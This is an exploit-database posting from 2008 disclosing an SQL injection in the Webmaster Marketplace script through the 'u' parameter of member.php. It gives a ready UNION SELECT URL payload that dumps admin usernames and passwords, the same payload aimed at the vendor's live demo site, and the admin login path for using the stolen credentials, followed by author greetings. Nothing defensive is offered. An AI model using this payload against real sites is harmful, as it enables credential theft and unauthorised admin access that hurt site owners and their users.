[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Webmaster Marketplace (member.php u) SQL Injection Vulnerability
# Published : 2008-12-10
# Author : Hussin X
# Previous Title : eZ Publish < 3.9.5/3.10.1/4.0.1 Privilege Escalation Exploit
# Next Title : Living Local 1.1 (XSS-RFU) Multiple Remote Vulnerabilities
Webmaster Marketplace (member.php u) Remote SQL Injection Vulnerability
___________________________________
Author: Hussin X
Home :IQ-SecuriTY > www.IQ-TY.com | TrYaG > www.TrYaG.cc
Mail : darkangel_G85@yahoo.com
___________________________________
script : http://www.unscripts.com/MPS.html
DorK : :(
exploit :
_______
http://www.site.com/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--
Demo :
_______
http://www.unscripts.com/MPS/member.php?u=15+UNION+SELECT+concat(user,0x3e,pass),2+FROM+admin--
login :
http://www.site.com/Admin/login.php
____________________________( Greetz )_________________________________
|
| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC
|
| My friends : str0ke | DeViL iRaQ | IRAQ_JAGUR | Sakab
|
| FAHD | jiko | IRAQ DiveR | Cyber-Zone | CraCkEr | G4N0K
|_____________________________________________________________________
IM IraQi | IM TrYaGi
# www.Syue.com [2008-12-10]